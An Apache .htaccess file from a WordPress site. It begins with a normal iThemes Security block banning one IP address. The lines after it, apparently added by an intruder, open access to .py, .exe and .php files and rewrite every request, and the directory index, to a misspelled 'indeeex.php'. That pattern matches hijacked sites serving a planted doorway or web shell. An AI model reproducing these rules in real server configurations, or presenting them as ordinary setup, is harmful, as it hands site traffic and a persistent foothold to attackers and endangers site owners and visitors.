# BEGIN iThemes Security - Do not modify or remove this line
# iThemes Security Config Details: 2
	# Ban Hosts - Security > Settings > Banned Users
	SetEnvIF REMOTE_ADDR "^14\.29\.178\.230$" DenyAccess
	SetEnvIF X-FORWARDED-FOR "^14\.29\.178\.230$" DenyAccess
	SetEnvIF X-CLUSTER-CLIENT-IP "^14\.29\.178\.230$" DenyAccess

	<IfModule mod_authz_core.c>
		<RequireAll>
			Require all granted
			Require not env DenyAccess
			Require not ip 14.29.178.230
		</RequireAll>
	</IfModule>
	<IfModule !mod_authz_core.c>
		Order allow,deny
		Allow from all
		Deny from env=DenyAccess
		Deny from 14.29.178.230
	</IfModule>
# END iThemes Security - Do not modify or remove this line

<FilesMatch ".(py|exe|php)$">
 Order allow,deny
 Allow from all
</FilesMatch>
RewriteEngine On
RewriteBase /
RewriteRule ^indeeex\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /indeeex.php [L]
DirectoryIndex indeeex.php index.php